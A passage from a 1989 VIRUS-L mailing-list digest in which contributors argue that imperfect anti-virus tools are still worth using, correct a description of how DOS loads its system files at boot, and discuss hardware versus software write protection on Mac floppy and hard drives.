  14038. afford protection (they may be "amateurish" but they're not
  14039. necessarily benign!) are still in the majority (at least among those
  14040. viruses which have become widespread).  And I think that it is well
  14041. worth protecting oneself against them, even if more sophisticated
  14042. viruses exist as well and will become more prevalent in the future.
  14043. Now I am well aware that no software can give complete security
  14044. against all conceivable viruses.  A month ago, I posted an appraisal
  14045. of FSP, in which I mentioned several shortcomings which I found in it,
  14046. including ways of circumventing it.  Yet *I continue to use it*
  14047. because there exist *many* infections which it *can* detect and
  14048. prevent.  I also use PROTECT (which is roughly like the two programs
  14049. mentioned at the beginning), and a good checksum pro- gram (to detect
  14050. all virus propagation).  (I'm considering using hard- ware protection
  14051. also.)  I know that none of these can prevent all con- ceivable
  14052. viruses under all conditions.  But I still think I'm safer using any
  14053. given one of them than not using it.
  14054.   The only argument which Dimitri gives for his statement is that one
  14055. might be lulled into using less discretion in deciding what to run on
  14056. his machine.  Now I would understand this argument in a situation
  14057. where anti-viral software is sold to naive customers under the false
  14058. pretense that it will prevent all types of infection.  But are we so
  14059. naive?  To give the impression, as Dimitri does, that it is worse to
  14060. use such software than not to use it, is certainly not correct in
  14061. general.  He doesn't explain just what his notion of discretion
  14062. consists of, but whatever it may be, why can't we use *both*
  14063. anti-viral software *and* discretion ....??
  14064.  
  14065.   The other point:  In V2 #5, Dimitri wrote:
  14066.  
  14067. >       ... it reads in the beginning of the directory and checks that
  14068. >the first 2 files are IBMBIO.COM and IBMDOS.COM (for PC-DOS) or IO.SYS
  14069. >and MSDOS.SYS (for generic MS-DOS). ....
  14070. >If these files are there, it reads (using INT 13) the first one (DOS
  14071. >low-level routines, _not_ BIOS---BIOS is in ROM!) into memory, usually
  14072. >at 70:0, and jumps there. IBMBIO.COM then loads the rest of DOS.
  14073.  
  14074.   The clause "it reads ... the first one [i.e. IBMBIO.COM or IO.SYS]
  14075. into memory" is not quite accurate.  It seems that what actually
  14076. happens is that the disk bootstrap routine loads a certain number of
  14077. sectors, starting from the beginning of the data area, into RAM, under
  14078. the *assumption* that these contain IBMBIO.COM/IO.SYS.  Depending on
  14079. the implementation, it may also do the same with the following sectors
  14080. on the assumption that they contain IBMDOS.COM/MSDOS.SYS, or else the
  14081. former program may load the latter.  But if the disk has been tampered
  14082. with, it is not necessarily these two files which will get loaded.
  14083.  
  14084.                                            Y. Radai
  14085.                                            Hebrew Univ. of Jerusalem
  14086.  
  14087. ------------------------------
  14088.  
  14089. Date: Tue, 10 Jan 89 13:26 EST
  14090. From: "ROBERT M. HAMER" <HAMER@Ruby.VCU.EDU>
  14091. Subject: Security/Virii Article
  14092.  
  14093. In the January 9 isue of InfoWorld, on page S1, continuing for 5 or 6
  14094. pages, there are several articles on computer security, viruses, worms,
  14095. etc, including a discussion of the now-famous Internet worm.
  14096.  
  14097. ------------------------------
  14098.  
  14099. Date: Tue, 10 Jan 89 10:56 MST
  14100. From: "Richard Johnson  <JOHNSON_RJ%CUBLDR@VAXF.COLORADO.EDU>
  14101. Subject: Disk protection (Mac)
  14102.  
  14103. >    There is much talk about disk protection for the IBM systems.  Does
  14104. > anyone have any Information relating to the MAC system? ...
  14105. >    Does this mean that the MAC is just as susceptible to viruses
  14106. > over-riding the write protection tab or is software just written to
  14107. > add the additional possibility of protecting hard drives?
  14108. >                                    Scott.
  14109.  
  14110. I assume that by disk protection you mean something along the lines of
  14111. write protection.  400K and 800K Mac floppy drives from Apple use a
  14112. pin that tries to fit through the write protect hole on 3.5" disks (at
  14113. least my drives do).  I don't have the drive schematics, but the
  14114. presence of that pin says to me that write protection on a 3.5" floppy
  14115. is done in hardware.
  14116.  
  14117. Hard drives are another matter.  I know of no hard drive that can be
  14118. write-protected via a hardware switch like a floppy drive write
  14119. protect.  All hard drive write protection I've seen for Macs is done
  14120. in software.  What can be done in software can be gotten around later.
  14121. Of course, with the healthy number of different SCSI drivers out
  14122. there, a virus that knows how to talk to all of them will be larger
  14123. than a virus that just uses disk or file manager calls.
  14124.  
  14125. Richard <Johnson_RJ@CUBLDR.Colorado.EDU>
  14126.  
  14127. *    Disclaimer: Since I'm self-employed, these    *
  14128. * opinions aren't necessarily those of my employer *
  14129.  
  14130. ------------------------------
  14131.  
  14132. Date:         Tue, 10 Jan 89 15:50:20 EST
  14133. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  14134. Subject:      Mac Write Protect Is Hardware
  14135.  
  14136. The title says it all. Mac write protect for floppies is hardware and
  14137. cannot be subverted by software according to Apple.  Hard disks are
  14138. another matter.
  14139.  
  14140. Why don't Mac manufacturers add on a "Write Protect" switch?  Seems
  14141. simple enough.
  14142.  
  14143. - --- Joe M.
  14144.  
  14145. ------------------------------
  14146.  
  14147. End of VIRUS-L Digest
  14148. *********************